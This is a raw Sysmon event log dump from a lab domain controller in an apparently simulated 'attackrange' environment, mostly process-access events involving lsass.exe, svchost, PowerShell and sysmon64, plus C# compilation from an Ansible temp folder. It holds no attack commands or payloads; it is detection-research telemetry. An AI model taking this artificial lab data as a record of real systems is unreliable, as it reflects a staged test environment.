13:54:02.169{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003137Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.169{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003136Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.169{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003200Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003199Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003198Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003197Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.730{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003196Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:03.027{10ACEC4A-857A-5FCF-9600-000000009101}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\ansible-moduletmp-132519092429341837-1367220028\4zc5nzpp.dll2020-12-08 13:54:02.949 10341000x80000000000000003195Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.027{10ACEC4A-8579-5FCF-8F00-000000009101}51081552C:\Windows\system32\conhost.exe{10ACEC4A-857B-5FCF-9700-000000009101}1928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003194Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.027{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003193Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.027{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003192Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.027{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003191Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.027{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003190Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.027{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003189Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.027{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003188Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.027{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003187Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.027{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003186Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.027{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003185Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.027{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-857B-5FCF-9700-000000009101}1928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003184Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.027{10ACEC4A-857A-5FCF-9600-000000009101}33684504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-857B-5FCF-9700-000000009101}1928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003183Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.029{10ACEC4A-857B-5FCF-9700-000000009101}1928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES104.tmp" "c:\Users\Administrator\AppData\Local\Temp\ansible-moduletmp-132519092429341837-1367220028\CSCD1BF7704C65443C4B6F98C359241C44.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8579-5FCF-5CDD-050000000000}0x5dd5c0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-857A-5FCF-9600-000000009101}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\ansible-moduletmp-132519092429341837-1367220028\4zc5nzpp.cmdline" 22542200x80000000000000003219Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.754{10ACEC4A-8579-5FCF-9200-000000009101}4336win-dc-935.attackrange.local0fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000003218Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.930{10ACEC4A-857D-5FCF-9900-000000009101}47844804C:\Windows\system32\conhost.exe{10ACEC4A-857D-5FCF-9800-000000009101}4772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003217Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.930{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-857D-5FCF-9900-000000009101}4784C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003216Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.930{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003215Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.930{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003214Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.930{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ec